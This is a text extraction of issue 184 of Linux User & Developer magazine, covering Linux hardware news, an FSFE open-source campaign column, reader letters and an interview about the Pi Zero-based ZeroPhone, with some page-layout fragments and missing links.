вход по аккаунту


Linux User & Developer - Issue 184 2017

код для вставкиСкачать
>_100 WAYS TO
> Become a command line guru in 24 hours
The hero building a $50
phone with the Pi Zero
01 01101100 01101100 01101111 00100000
11 01110010 01101100 01100100 01001000
00 01101100 IDENTITY THEFT 01010111
10 01101100 01100100 01001000 01100101
00 01101111 01101111 01110010 01101100
00 01100101 01101100 01101100 01101111
111 01101100 01100100 BANK ACCOUNTS
00 01101100 0 01101100 01100100 01001000
00 01101100 01101111 00100000 01010111
10 01101100 01100100 01001000 01101
00 0100100 01101100 01101111 00100000
11 01110010 01101100 01100100 01001000
00 01101100 01101111 00100000 01010111
01101100 01100100 01001000 01100101 01101100
Build a Pi piano
Plus! Python &
Minecraft advice
Top pen-testing
Learn how to find the
weak points like a pro
Qubes OS 4
Python IDEs
Ed Snowden’s favourite
distro gets a big update
Get the perfect environment
for your next Python project
> Shell scripting > Learn Java
> Build an Arduino web server
» How I built a robotic
arm for my daughter
» Linux in space
Issue 177
Future Publishing Limited
Quay House, The Ambury,
Bath BA1 1UA
Editor Chris Thornett
% 01202 442244
Designer Rosie Webber
Production Editor Phil King
Editorial Director Paul Newman
Senior Art Editor Jo Gulliver
Dan Aldred, Michael Bedford, Joey Bernard, Christian Cawley,
John Gowers, Toni Castillo Girona, Paul O’Brien, Nate Drake,
Jon Masters, Calvin Robinson, Mayank Sharma, Alexander
All copyrights and trademarks are recognised and respected
Media packs are available on request
Commercial Director Clare Dove
Advertising Director Richard Hemmings
01225 687615
Account Director Andrew Tilbury
01225 687144
Account Director Crispin Moller
01225 687335
Linux User & Developer is available for licensing. Contact the
International department to discuss partnership opportunities
International Licensing Director Matt Ellis
Print subscriptions & back issues
Tel 0344 848 2852
International +44 (0) 344 848 2852
Circulation Director Darren Pearce
01202 586200
Head of Production US & UK Mark Constance
Production Project Manager Clare Scott
Advertising Production Manager Joanne Crosby
Digital Editions Controller Jason Hudson
Production Manager Nola Cokely
Finance & Operations Director Angie Lyons-Redman
Creative Director Aaron Asadi
Art & Design Director Ross Andrews
Printed by
Wyndeham Peterborough, Storey’s Bar Road,
Peterborough, Cambridgeshire, PE1 5YS
Distributed by
Marketforce, 5 Churchill Place, Canary Wharf, London, E14 5HU Tel: 0203 787 9060
We are committed to only using magazine paper which is derived
from responsibly managed, certiied forestry and chlorine-free
manufacture. The paper in this magazine was sourced and
produced from sustainable managed forests, conforming to strict
environmental and socioeconomic standards. The manufacturing
paper mill holds full FSC (Forest Stewardship Council) certiication
and accreditation
All contents © 2017 Future Publishing Limited or published under
licence. All rights reserved. No part of this magazine may be used,
stored, transmitted or reproduced in any way without the prior written
permission of the publisher. Future Publishing Limited (company
number 2008885) is registered in England and Wales. Registered
ofice: Quay House, The Ambury, Bath BA1 1UA. All information
contained in this publication is for information only and is, as far as we
are aware, correct at the time of going to press. Future cannot accept
any responsibility for errors or inaccuracies in such information. You
are advised to contact manufacturers and retailers directly with regard
to the price of products/services referred to in this publication. Apps
and websites mentioned in this publication are not under our control.
We are not responsible for their contents or any other changes or
updates to them. This magazine is fully independent and not afiliated
in any way with the companies mentioned herein.
If you submit material to us, you warrant that you own the material and/
or have the necessary rights/permissions to supply the material and
you automatically grant Future and its licensees a licence to publish
your submission in whole or in part in any/all issues and/or editions
of publications, in any format published worldwide and on associated
websites, social media channels and associated products. Any material
you submit is sent at your own risk and, although every care is taken,
neither Future nor its employees, agents, subcontractors or licensees
shall be liable for loss or damage. We assume all unsolicited material
is for publication unless otherwise stated, and reserve the right to edit,
amend, adapt all submissions.
ISSN 2041-3270
to issue 184 of Linux User & Developer
This issue
» 100 ways to master the terminal, p20
» Building a robotic arm for Lorelei, p18
» Take the pen testing challenge, p52
Welcome to the UK and North America’s
favourite Linux and FOSS magazine.
Ever wondered where all your taxes go? Well, in
the UK a chunk of it is merrily flung down a closed
source software hole that public administrations
are destined to fill again and again in a Sisyphean
nightmare (and a government contractor’s
sweetest dream). The Free Software Foundation
Europe is running a campaign to raise awareness
of this waste of taxpayer’s money (see p9 for the
full details). Note: If you’re in the US, check out and consider writing to your representative to ask
them to increase the current requirement to open-source 20% of
new code that’s commissioned.
In the rest of the magazine, we’ve homed in on the command
prompt with our bumper feature on working efficiently in the
terminal (p20), plus John Gowers’s excellent series on shell
scripting (p38). We follow that up with a guide to how pen testers
poke and prod company systems for vulnerabilities and finish our
features with a stimulating read on the fortunes of Linux in space
exploration (p34). As you’ve come to expect, we’ve got plenty of
tutorials too, including something a bit spooky for the end of the
month (p72) and a new series on unusual Arduino projects (p42).
Chris Thornett, Editor
Get in touch with the team:
For the best subscription deal head to:
Save up to 40% on Xmas subs! See page 32 for details
01001000 01100101 01101100 01101100 01101111 00100000
01010111 01101111 01110010 01101100 01100100 01001000
01100101 01101100 01101100 IDENTITY THEFT 01010111
01101111 01110010 01101100 01100100 01001000 01100101
01101100 01101100 01101111 01101111 01110010 01101100
01100100 01001000 01100101 01101100 01101100 01101111
00100000 01010111 01101100 01100100 BANK ACCOUNTS
01100101 01101100 01101100 0 01101100 01100100 01001000
01100101 01101100 01101100 01101111 00100000 01010111
01101111 01110010 01101100 01100100 01001000 01100101
01101100 01101100 01101111 WEAK PASSWORD 01110010
01101100 01100100 0100100 01101100 01101111 00100000
01010111 01101111 01110010 01101100 01100100 01001000
01100101 01101100 01101100 01101111 00100000 01010111
01101111 01110010 01101100 01100100 01001000 01100101
06 News
20 100 Ways to Master
the Terminal
38 Essential Linux
Manjaro-powered Spitfires incoming
and the FSFE hits the campaign trail
10 Letters
Enter the world of readers’ minds
12 Interview
Arsenijs Picugins is close to creating a
phone made using a Pi Zero
16 Kernel Column
The latest news on the Linux kernel
18 Lorelei’s story
The journey of a father and daughter to
crowd source a prosthetic arm
Unlock the power of the terminal with
Neil Bothwick’s guide to many of the
most useful commands and a host
of handy tips and tricks to help your
fingers dance over that keyboard
34 Linux in Space
While Linux is key to much of NASA’s
space exploration, its usage is mainly
confined to computers on Earth, as
Mike Bedford reports
52 Pen-testing
Having nightmares about data
breaches on your systems? Identify
those weak spots by following the
seven stages used by professional
penetration testers
In part three of our Master Shell
Scripting guide, we explore some
more useful commands and learn
sophisticated ways of chaining and
grouping them together
42 Arduino
While Arduinos are mainly used for
controlling hardware, they can do a lot
more – find out how to use an Arduino to
create your own web server which can
double as an IoT device
46 Java
Following on from last issue’s tutorial,
discover how to broadcast your newly
created adventure game across a
network using Java’s fully featured
networking library
Issue 184
October 2017
94 Free downloads
We’ve uploaded a host of
new free and open source
software this month
Practical Pi
Back page
64 Pi project
81 Group test
96 Short story
Powered by the Google AIY Kit, Martin
Mander’s smart intercom answers
questions and follows commands
66 Python & Minecraft
Create a Minecraft chatbot that reads
from a text script
68 Piano HAT passwords
Instead of text passwords, secure your
files with a series of piano notes
72 Ghost detector
A Pi owner’s guide to ghosts and how
to catch them
78 Pythonista’s Razer
Learn how to use Python perform
complex geodesy calculations in the field
This quartet of dedicated Python code
editors enable you to write code with
ease and help to hone your skills, but
which is the best?
What happens if you can’t keep up the
repayments for on your limb loan?
86 Hardware
Can you really fit a full PC experience
in your jacket pocket? The GPD
Pocket aims to offer just that
88 Distro
Qubes OS 4.0 RC1 adds several
enhancements to the security-centric
distro, but at what cost?
90 Fresh FOSS
OpenShot 2.4 video editor, TruPax 9B
encryption tool, DDRescue-GUI 1.7.1, and
Rambox 0.5.12 unified messaging app
Save up to 40% when you
subscribe! Turn to page 32 for
more information
06 News & Opinion | 10 Letters | 12 Interview | 16 Kernel Column
Station X launches Spitfire laptop
New Linux notebook is finely tuned Manjaro-powered machine
Bletchley Park-based Station X is releasing
a Manjaro special edition version of its
Spitfire Linux laptop. Available from October
with either Intel Core i5 or i7 processors
(7th gen), DDR4 RAM (up to 32GB), and a
maximum of 500GB SSD (with space for a
second drive), and Intel 610/620 graphics,
this full HD IPS laptop will retail from £850.
Station X isn’t spinning its own distro,
but is partnering with existing, notable
development teams in the Linux world
to produce tailored distributions, heavily
customised for the target device. There is
also support for 26 other distros.
Station X founder, Eddie Vassallo tells us
that “Manjaro Special Edition Spitfire has
been designed from the ground up by the
Manjaro Team – meaning it’s not simply a
preload, but a fully customised experience
from the kernel-level on up. We have been
working with the Manjaro Team since June
to create something very special for the
Manjaro community and the wider Arch
community as a whole.”
This customised experience, says Vassallo,
covers “tweaked kernel settings, power
and performance settings, and even sound
settings to get the most battery life, power,
and experience out of the machine. The
special edition of the Manjaro software will
be maintained and updated via the main
Manjaro repos – so every update will come
to the machine as well.” It doesn’t stop
there, as there will also be software support
and custom assets, “like exclusive themes,
wallpaper, icons and more.”
Other distro teams, such as Debian and
Solus, are working with Station X to develop
custom experiences. It seems likely these will
appear on other devices in Station X’s World
War II aircraft-themed range of computers.
Along with the lightweight Spitfire, its site
lists a Hurricane, Hellcat and Blenheim.
“We’re very careful about the naming,” says
Vassallo, “as we want the characteristics of
those actual period aircraft to reflect the
qualities and attributes of each machine.”
As an example, he cites the Lancaster as
Above Can the lightweight Spitfire shoot down the
proprietary laptop competition?
Station X’s “‘heavy bomber’ with dedicated
Nvidia graphics up to a GTX 1070.”
None of this would be possible if there
was no market, of course, and Vassallo
is upbeat about the future: “I think we’re
in a bit of Renaissance with both Linux
software and hardware. Linux distribution
and desktop environments have never been
more exciting. I’m so excited for Station
X to join more established providers like
System76 and Purism!”
Learn more at
Top 10
(Average hits per day, 30 days to 25 September)
This month
Slimline Noodle Pi handheld
computer launches
■ Stable releases (21)
■ In development (6)
Updates were released
for three securityfocused distros, which
offer pen-testing tools,
anonymous browsing
and computer
forensics software.
Pi-based kickstarter goes mainstream
Noodle Pi is a Raspberry Pi Zero-based
portable PC that deftly solves one of
the key problems of the British-built
mini-computer: once components are
connected, things can get a bit messy.
Using a Raspberry Pi Zero, touchscreen
display, 500mAh battery, v2 Camera Module
and unibody case, the Noodle Pi – at its
thinnest just 10mm thick – claims to be the
first modern open handheld computer.
Two versions are available, the $49 DIY kit
with a 3D printed shell and other structural
parts which requires you to buy your own Pi
and other components, and a $199 fully preassembled and tested Noodle Pi, in standard
Pi Zero and Pi Zero W flavours.
The result of a successful Kickstarter
campaign, prototyping has taken maker
Ashish Gulhati several years; the arrival of
Pimoroni’s HyperPixel 3.5-inch touchscreen
is the breakthrough that’s made the Noodle
Pi possible. Gulhati tells us how unsuitable
the alternatives were just 12 months ago: “I
tried with various different small displays,
but the ones available in 2016 were pretty
limited in resolution, typically only 320×240
pixels, and had rather poor touch interfaces.
Some of them were also way too big in the
height dimension and needed destructive
modifications to remove tall headers. And
connecting them required soldering.”
As with any Pi computer, the real magic
comes in finding new ways to use the device.
The portability of the Noodle Pi is bound
to inspire a bunch of new uses, something
Gulhati is particularly excited about.
“The possibilities are quite endless! Being
a complete, integrated device, I dare say it
has even more versatility and use cases than
a bare Raspberry Pi board. I’m discovering
new real uses for them every day and it’s
very exciting. I think Noodle Pi will really help
unlock the full potential of the Raspberry Pi.”
One such use is the Noodle Unsnoopable,
which uses the standard Pi Zero to create an
air-gapped portable computer, but Gulhati
has aspirations for Noodle Pi to find its way
to developing countries, with uses ranging
from mobile software development to
wearable projects.
Noodle Pi is currently available to order
Subgraph OS
Debian-based Subgraph OS offers provides
several security, web anonymity and
hardening features. Among them are a hardened
kernel and application firewall, while all internet traffic
is routed via Tor. Email encryption is supported, while
the file manager strips all metadata.
Parrot Security OS
Based on Debian, Parrot Security OS is
a security-focused distro that bundles
standard features alongside pen testing, cryptography,
privacy, ethical hacking and other utilities. Ships with
the MATE desktop environment.
Kali Linux
Another Debian-based security distro, this
is the most well-known Linux penetration
testing system. Packed with security and forensics
tools, Kali Linux also supports ARM devices and
includes four desktop environments.
Latest distros
Your source of Linux news & views
Can Atari make Linux gaming big?
Legendary game maker identifies a Steam machine-sized hole
As surprises go, news that Atari is
crowdfunding a Linux-based console is a
big one. Since merging with Infogrames in
2008, Atari has released – or licensed – a
number of classic hardware revivals. None
has come close to meeting expectations, but
the Ataribox might just change that.
Running Linux, and featuring a customised
AMD processor with Radeon graphics and
various memory configurations, the (optional)
wood-panelled console evokes memories
of the classic Atari 2600. Only this time,
gaming, media apps and web browsing are
all possible.
But why Linux? Here’s the encouraging
part: “Most TV devices have closed systems
and content stores. Linux lets us be more
open; you can access and customise the
OS, and you can access games you’ve
bought from other content platforms (if
compatible…). This approach means that as
As well as being a great
gaming device, Ataribox is
also a full PC experience for
the TV
Above The Ataribox will offer backers the option of real wood panelling
well as being a great gaming device, Ataribox
is also a full PC experience for the TV,
bringing you streaming, applications, social,
browsing, music, and more.”
The Ataribox project team has a clear
plan, and along with a bunch of pre-installed
classic Atari games, the console will be able
to play games from Steam, and other
digital download services.
Expected to cost $249-$299, the Ataribox
is launching on Indiegogo soon and special
editions, early access bonuses and more are
being hinted at by the company.
In a world where the Steam machines
remain largely unknown, and Android console
gaming has inexplicably failed to make its
mark, history is stacked against the Ataribox,
but we’ll have to wait and see.
GNOME and Plasma back Purism Linux phone
Librem 5 smartphone attracts big-name support
Following news of the Purism Librem 5
phone, two big hitters in the open source
Linux world have announced their attention
to get involved.
First comes the partnership between
Purism and KDE Plasma in a venture that
will see a pooling of resources to bring the
Plasma Mobile platform to the Librem 5.
This is an ideal team-up: KDE Plasma Mobile
will gain some up-to-date hardware to base
its operating system on, while Purism is set
to fulfil its goal of developing a mobile OS
with full encryption. But does this mean
that Plasma Mobile will be the default OS
on the Librem 5? Time will tell, but the initial
announcement indicated that a GNOME UI
would be employed.
Unsurprisingly, the second name to get
involved is the GNOME Foundation, which
has expressed an interest “in advancing
[Librem 5] as a GNOME/GTK phone device.
The GNOME Foundation is committed to
partnering with Purism to create hackfests,
tools, emulators, and build awareness that
surround moving GNOME/GTK onto the
Librem 5 phone.”
However, the Foundation’s involvement
with Librem 5 comes at a price: Purism’s
crowdfunder must reach its $1.5 million goal
by mid-October. If successful, GNOME will
get involved to help “enhance GNOME Shell
and general performance of the system with
Purism to enable features on the Librem 5.”
With a focus on security, privacy and
freedom, there’s a feeling that the Librem 5
is something that just has to happen. Will
other big names collaborate on producing
a workable mobile Linux operating system
before the crowdfunder goal is reached?
Public Money? Public Code!
he Free Software Foundation Europe’s
‘Public Money? Public Code!’ campaign
wants to curb the trend for using closed
software and proposes that all software
developed using public funds be made publicly
available as free software.
The campaign is designed to inform the general public
about how there are several good reasons for this, about
how, despite the fact we are paying for closed software
now, we are not benefiting from it. Quite the contrary:
often we are suffering because of it, as we are paying
more for useless reinventions of the wheel every time
a public administration needs a piece of software that
another already has, but decided not to share.
As a counterpoint to having to recreate (and pay for)
closed source software again and again, we point to
success stories in FLOSS, like that of FixMyStreet. The
FixMyStreet project is an unassuming piece of software
used to report problems like potholes, broken pavements
or rubbish on the street. It’s used by town halls on five
continents – all because its code can be shared.
But explaining the evils of proprietary software to
the general public is often hard. Frequently we, the
free software advocates, come across with ineffectual
arguments that seem to frame the issue as an usversus-them paradigm. Such is the case when we start
waffling on about vendor lock-in. To the casual tech
user, it is not immediately apparent why this is a bad
thing. Because of how the software market has evolved,
the current mindset is that of course you should resort
to the original manufacturer for repairs, corrections
and upgrades. However, the problems arise when the
provider will not help you and nobody else can, and they
only become apparent when they happen, and then the
evidence seems anecdotal. Hence, we had to go the
extra mile in this campaign and reason every step of why
relying on a single provider for public institutions is a bad
If arguing about vendor lock-in looks like the rantings
of a disgruntled loser that never made it in the market
(although we all know that both parts of that sentence
are untrue), mentioning all the security problems,
unintended and otherwise, that come with proprietary
software sounds paranoid to a tinfoil-hat level. But we
can point at the Wannacry debacle, which came about
because the British NHS relies on proprietary software
working on obsolete platforms that it could not afford
to upgrade. There’s also Spain’s Lexnet, a poster child of
what a public software project should not look like. This
legal service was blown wide open, allowing everybody
to access private and confidential information related to
every court case being held in Spain. As for proprietary
software deliberately syphoning information to its parent
companies and security agencies of foreign countries…
well, that has become the unfortunate norm.
Despite all the evidence; despite every argument
against spending public funds on the development of
proprietary software, here we are: public administrations
still do it, the general public is as in the dark as ever
about how their tax money is squandered, and politicians
are either clueless or don’t care. That’s why a campaign
like PM?PC! is necessary.
As I write this, the German elections are in full
swing. At this point the FSFE has made sure that every
candidate to the Bundestag has received a copy of the
Paul Brown/FSFE CC By-SA
Most public administrations are spending our taxes on
developing proprietary software. Paul Brown hopes you agree
that this is a terrible idea
Paul Brown
is the Communications
Officer for KDE and
the Free Software
Foundation Europe. He’s
been writing about and
defending free software
for over 20 years.
The general public is
as in the dark as ever
about how their tax money
is squandered
PM?PC! open letter. The letter has now been signed
by over 11,000 people and has been endorsed by more
than 70 organisations. It lays out in no uncertain terms
why public money should be spent on free and open
public code.
Before the elections to the European Parliament of
2019, all the wannabe MPs will also get the letter. We are
also encouraging sympathetic activists all over Europe to
use it to try to convince lawmakers in their own countries
to pass legislation that prioritises spending public funds
on developing software in the open. The more people
that support this cause, the more pressure we can exert.
That is why it is important you sign the letter too (https:// It only takes a few minutes
and you’ll be helping convince institutions that Public
Money should be spent on Public Code.
Your source of Linux news & views
Your letters
Questions and opinions about the mag, Linux and open source
Got something to
tell us or a burning
question you
need answered?
Email us on
Above Bob doesn’t like American English, but he needn’t feel that he should suffer as most contemporary Linux distributions, like Manjara
Linux, offer UK English – and US English and Canadian English for that matter – as an installation option
I’m English! Cor
blimey, guv’nor
Increase the popularity of Linux – remove Windows
XP everywhere! have played with Linux for at least ten
years, [yet] every attempt at dual-booting Windows and
Linux has ended in disaster. Possibly my own fault but
who knows? I have participated in LUGs – p’d off with
the arrogant persistence that you don’t know what you
are doing till you use the command line. I’ve not used a
command line since C/PM. And yes, I did program in C/
PM. I’ve still got it somewhere on 10-inch floppies.
Now, I am English, my ’pooter language is British
English. Only one recent distro loaded from live ISO
and was 90% usable instantly – Magea. Every other
distro presumes I am US American and uses that faulty
version of the English language. An XP user prepared to
give Linux a whirl will go no further. Windows, after all,
picks up largely who and what you are and will give you a
one-click language setting for starters. Now, I know there
are a lot of Window users who don’t know that there is a
difference with English versions – I have been tempted to
use Irish English myself.
One of my granddaughters had her English homework
corrected by a teacher who struck out some of her
words as misspelled and substituted the US spellings.
I had a word with the school head who immediately got
the IT manager to check all the school systems for the
correct language.
You clever clogs who live and breathe Linux may
be able to quickly sort this problem out, but a newbie
won’t. Please, can we have UK market Linux distros with
default British language and keyboards and no need for
the command line? Yes, there is a ghost of MS-DOS still
in Windows, but updating to the latest Window version
doesn’t require the new user to know anything about it!
By the way, my currently (still) installed Linux is the
lovely little Puppy! What a pet. Boots from external HDD.
Bob Dove
Chris: Thanks for your email, Bob. I agree we need
to remove as many barriers from new Linux users as
possible, but American English is ‘faulty’? Seems a little
harsh on our American friends, but I do feel your pain. If
you don’t want American English foisted on you, it can
be grating to see it taunting you from every interface.
However, you don’t need to use the command line to
select the right language at install on many modern
distros now. In Ubuntu, for instance, you can choose
English (UK) when you progress through the installation
wizard. If you look on the Ubuntu flavours page, it
states that the standard Ubuntu images only support
a few languages, but that list does include ‘English
(US, UK, AU)’. My current pet peeve is that the install
of LibreOffice on the office machines has the UI locked
down to English (US), which means I can’t install language
packs to rectify the problem. The sight of ‘color’ instead
of ‘colour’ may be upsetting, but I have to remind myself
that language is a mutating creature and I’m getting
upset about the American spelling of an English word
with French origins.
Wi-Fi woes
My Ubuntu 17.04 isn’t working in Wi-Fi – can anyone give
me suggestions?
Yeshi Jinsel via @LinuxUserMag on Twitter
Chris: There could be so many answers to this as we
don’t know enough about Jinsel’s system, but given
that this was a fresh install, it’s likely the issue with
NetworkManager that was discovered in the initial
release (although some users are suggesting that it’s
still a problem in betas of 17.10). Personally, I found I had
Wi-Fi problems in 17.04 initially, but they went away after
an update. However, the original issue was that a new
release of NetworkManager (1.4.0) added a new ‘security
feature’ that randomly changed the current MAC address
of your Ethernet or Wi-Fi card, which caused connection
issues. The workaround, found by an OMG! Ubuntu user,
is to edit the /etc/NetworkManager/NetworkManager.
conf file and add the following entry:
Above There was a workaround for the Wi-Fi problems in Ubuntu
17.04 caused by a new ‘feature’ in NetworkManager, but it should be
fixed now and not an issue in 17.10
A box full of
and some
Club is about to
become even
more fun!
A quick restart of the networkmanager service is required
after changing the config file. Good luck!
Managed Wordpress Cloud
It’s Simple. We Manage Everything
start today with
off your first month
03330 439780
Your source of Linux news & views
Project ZeroPhone
Undaunted by the scale of the endeavour, Arsenijs Picugins is close to creating a
kit that will enable other enthusiasts to build their own mobile phone constructed
from a Pi Zero, custom PCB designs and components costing $50
Arsenijs Picugins
is 22 years old and the
creator of ZeroPhone.
He’s taken time out from
his university studies to
concentrate on projects like
the phone and helps manage
the Make Riga Hackerspace.
The growth of open hardware is undeniable and
we’ve had high-profile smartphone projects
appearing such as Purism’s security- and privacyfocused Librem 5 smartphone (
shop/librem-5). The ZeroPhone project led by
Arsenijs Picugins is no less ambitious but much less
expensive. As we started the interview we noted,
with some irony, his apologies for the intermittent
mobile connection as he’s taking a break away from
his home city of Riga to enjoy the countryside of
neighbouring Lithuania.
While you’ll be able to make calls and send SMS
with Picugin’s ZeroPhone, it isn’t as cutting edge as
Purism’s smartphone. Instead, it sits firmly in the
middle of the makery and hacking spirit that powers
the big budget open hardware projects. The phone’s
design is pragmatic, with its use of the Raspberry
Pi Zero, surface-mounted switches and 1.3-inch
128×64 monochrome OLED screen, but it’s a clever
approach to a DIY Pi phone and Picugins, a 22-yearold student from Latvia, is hoping other enthusiasts
will snap it up as a kit when he launches a crowdfund
to cover manufacturing costs.
In its current form, the ZeroPhone is a Raspberry
Pi Zero in a ‘PCB sandwich’ that has Wi-Fi (using
an ESP8266), HDMI and audio outputs, a free
full-sized USB host port and a micro-USB port for
charging. One feature that has caught the attention
of hardware hackers is the use of GPIO expansion
headers for hardware add-ons and customisation,
Picugins is still working on a 3G modem (see p15). On
the coding side, it uses Python and has a UI toolkit
designed to make app development quick and easy.
The big question is can you assemble a phone
from easily available parts, using cheap boards
running Linux?
Well, I’m making sure it’s the case. Right now there
are two people who are trying to assemble the
phone independently. It’s a slow project and I don’t
yet have all the assembly instructions published
and polished, which is one of the things that I’m
trying to finish for the Hackaday Prize deadline
that’s in 20 days. But it’s one of the selling points
from the beginning, as it’s possible. You can get
components that make up a phone together, unite
those components together and just assemble the
whole thing and put some solder on it. This is pretty
much what manufacturers do [...]. Of course, they
assemble the phones by using a lot of automation.
Intel inside Intel
So, what is Intel Management Engine is
and why might users want to deactivate it?
Imagine if there was a ‘black box’ operating
at the lowest level of your Linux machine
with control over every part of the system
and you couldn’t access this box or control
it. Well, if you have an Intel CPU that’s what
you’ve got and it’s called Intel Management
Engine (ME). ME is an independent processor
core that’s embedded inside the Multi-Chip
Package (MCP) on Intel CPUs. This operates
independent of the main processor, the BIOS
and your operating system, but it interacts
with the BIOS and OS kernel.
Recently, there were vulnerabilities found
in some Active Management Technology
(AMT) modules which exist inside some Intel
Management Engines. These AMT modules
(or what Intel calls vPro enabled) are used
for remote out-of-band repair work and
can be used to monitor, maintain, update
and upgrade a computer. This meant that
many machines with Intel CPUs, mostly
being used in an enterprise setting, were
disastrously vulnerable to remote and local
attack. Fortunately, there was a way to
disable AMT, but deactivating or limiting MEs
generally is complex, which is why Purism,
as a manufacturer, has had more success by
tackling it with a combination of “hardware
selection, hardware configuration, hardware
fuses and firmware”.
Do you have to be reasonably competent at
soldering to do this?
Yes, I don’t think assembling this phone is suitable
as a first-time project in soldering. I think it’s a
second- or third-time project. Also, a large part of
soldering can be automated [Picugins has access
to a Pick&Place machine in the Riga hackerspace].
So I can provide kits with the hard-to-solder parts
already assembled. Even then, without hard-tosolder parts already on, people still can assemble it
themselves – I can just have to simplify the process.
For example, there’s a GitHub (
ZeroPhone) where all the schematics and board files
are available. One example of hard-to-solder parts
that are easy to automate are buttons – you don’t
have to sell just the keypad and buttons separately. I
can just solder them on and sell it to people like that
in the form of kits. The parts that are either hard or
expensive to automate, this is something that would
be economical and reasonable to let the recipient
do, because otherwise I’m afraid it will drive the
price point too high.
So you’re keen to keep it around $50 for all the
For all the bits, yes. But this is how much the bits
cost, bill of materials. Right now it’s around $40 and
I might add $5 of components, but then if I’m selling
kits myself and have to package them, test them and
ship them, then the kits aren’t going to cost $50. But
I want to stay below at least the $100 mark, because
it’s a psychological limit above which it’s harder to
justify spending money on something.
For the phone itself, what’s the situation with
software? What OS are you using?
Above With the SPI flash chip and I2C
EEPROM programming add-on board, the
ZeroPhone can help re-flash the BIOS on an
x86 device or fix broken router firmware
So there’s an operating system which is Raspbian
Linux. But Linux itself works great, because it’s on
a Raspberry Pi. Among all things Raspberry Pi is
famous for is software support. It’s really great,
even though there are closed source bits, which are
sometimes problematic. I think it’s one of the best
for support right now, when speaking about singleboard computers. They have the resources and take
user feedback into account.
So it’ll be running a cut-down version of the
Raspbian distribution?
It’s without the desktop environment. There’s
a Raspbian Lite distribution and that’s what
I’m using and it makes sense to run something
without a desktop (by default) on a small phone
like this. Speaking about the UI, right now it’s
Python powered. There are no X server drivers, or
something like GNOME native Linux support for it,
so it’s a tad problematic, but there still isn’t a good
UI framework for Linux phones with small screens.
There are all types of Android frameworks, but I
don’t know of any UI framework that I could use even
if the screen had a frame buffer, so there just isn’t
such a thing except for what I’ve developed. So I had
the option of using something of my own or using
some kind of library for the screen and writing all
the applications myself and not use all the terminal
utilities that are available or I could spend a lot of
time to make some kind of frame buffer bindings
and then put up with the illegibility of the console
because it doesn’t have enough characters – it can
only have the standard 24 to 8 characters on screen,
when standard is 80x24 and some apps require
that. So I had to roll something of my own. [This
interface was based on of one of Picugins’s earlier
I can provide
kits with the
parts already
Your source of Linux news & views
Hackaday projects called pyLCI – see
I’ve sent out
hardware to
case designer
volunteers. I’d
really like to
Do you think down the line, you might go for a
higher-resolution screen?
Like touchscreen? Looking at the situation with
screens that you could connect to the Raspberry Pi,
the thing is this is one of most reasonable solutions
as the interfaces that Raspberry Pi provides do not
give that much leeway to work with. For example,
there is an SPI interface, but the refresh rate is
not going to be good and there’s not going to be
hardware acceleration. There’s HDMI, but screens
that use HDMI usually consume plenty of power.
That would also complicate the hardware design,
because HDMI lines require a lot of attention
because of the requirements of the PCB layout.
There’s also DSI interface: it’s the interface to go
[with] if you want to make a portable device with a
large screen, but it’s neither accessible on the Pi
Zero which I’m using, [nor] is it documented. They’ve
not documented that interface and do not provide an
API to connect your own screens.
I have one interface that I can reasonably use
for a mobile and that’s SPI, but the refresh rate is
not that good for large screens. You can have SPI
screens that are well built, but you’re basically
limited to Adafruit or Sparkfun or some Waveshare
product, but I didn’t want to specifically limit it to
that selection as it’s not that accessible to me. They
really don’t have much interest here.
You’re saying distribution is limited?
Yes, exactly. Also, this small screen is an interesting
limitation. It’s an interesting mental exercise thinking
about how to fit everything into such a small screen;
make the interface usable and use physical buttons
to a large extent [...]. It works and it’s still cheap and
it’s also a simple way.
In one of your posts somebody was looking at
coming up with a different way to work with the
UI? You’ve got people wanting to help collaborate?
Yes, absolutely, people helped. There was a small
road block from my side because I couldn’t send out
hardware to contributors for quite some time, due
to hardware problems I was solving. But now I’m
sending out hardware that people can work with.
For example, I’ve sent hardware to one guy who is
interested in making Wayland run and he’s done
some software demos of this small screen, e.g., this
128×64 pixels viewport working with OpenGL.
That’s exciting – how is the chassis design going?
I’ve sent out hardware to case designer volunteers.
I’d really like to outsource. I’m mostly feeling
overwhelmed because there’s so much to do, so
people have been really interested in making a case
[for the phone]. So I’ve sent out three phones and I’m
going to send out three more. I’ll continue sending
them out to those people that want to help. I don’t
really have that much experience in 3D modelling.
That’s why there’s not a case yet, as I can’t make it
myself. I’d need to spend even more time learning
how to do it myself.
How is the crowdfunding project progressing?
It’s not quite ready yet. I have the most important
part, the financials, to be prepared. And there’s
also the fact I want to make a stable hardware
revision, which will be the next revision, so that I can
account for the bill of materials changes that might
be necessary, and make sure they don’t impact the
manufacturing in any significant way.
That’s been a blocker for the last five months.
It’s been getting ridiculous even for me, but I want
to make sure everything is going to be okay as even
though I have people who can give me advice, I really
want to make this project succeed and not stumble
upon something unforeseen. So I’m making sure
that the crowdfunder is as good as possible.
I know for example that this revision needs some
more self-assembly instructions and I need to get
more feedback and check the financials so there’s
Add-ons for free interfaces
The ZeroPhone has a number of unused hardware interfaces, including SPI, I2C
and I2S, which Picugins has used for optional add-on boards. So far he’s worked
on an SPI flash chip board (pictured, in the Intel Inside Intel box), which can be
used to, for instance, perform BIOS reflashing. He’s also added a USB-UART on the
micro-USB port that can be used for debugging as well as charging the phone and
is developing a microphone board that uses the I2S interface (although Picugins
says this board will stick out a little due to the way its mounted). He’s even made an
infrared receiver and transmitter board, which he admits has limited use (unless
you want to annoy the regulars in your local boozer by changing the channel on their
old pub telly). This board plugs into a 5-pin socket on the top of the ZeroPhone and
adds IR LEDS and an IR receiver.
Above Picugins has developed a number of add-on boards
using the free interfaces on the Pi Zero. He’s hoping to
crowdfund as many mods as possible
no chance of me running out of budget during
the manufacturing. So, yes, it’s mostly about me
being nervous.
There are two people that I know of that are
already trying to assemble the current revision, but
there are also six people that want to assemble the
next revision. I’ve already bought parts for them, now
I’m working on the PCB design. So, self-assembly is
a real priority. After all, it’s something nobody really
offers, but it’s completely possible to achieve.
Have you managed to get the ZeroPhone to
support 3G?
It basically needs the 2G modem replaced with
the 3G and it’s possible, but I’m constrained by the
dimensions of the 2G modem that I’m using, so
I’m trying to design around those dimensions. Two
weeks ago, when I was finishing the 3G upgrade
board, I ran into limitations, so I’m thinking about a
way around them by either increasing the vertical
dimensions of the phone or basically having a part
that sticks out a little. I’m waiting for a solution to
come to me while I have PCBs to make for the next
revision. But it’s definitely one of the priorities for
the crowdfunding.
There’s a survey for those who want to get a
ZeroPhone or are interested in the project, so I’ve
been collecting replies and I think 3G is the most
requested feature. So I have to have 3G to offer for
the crowdfunder or it will be a serious disadvantage.
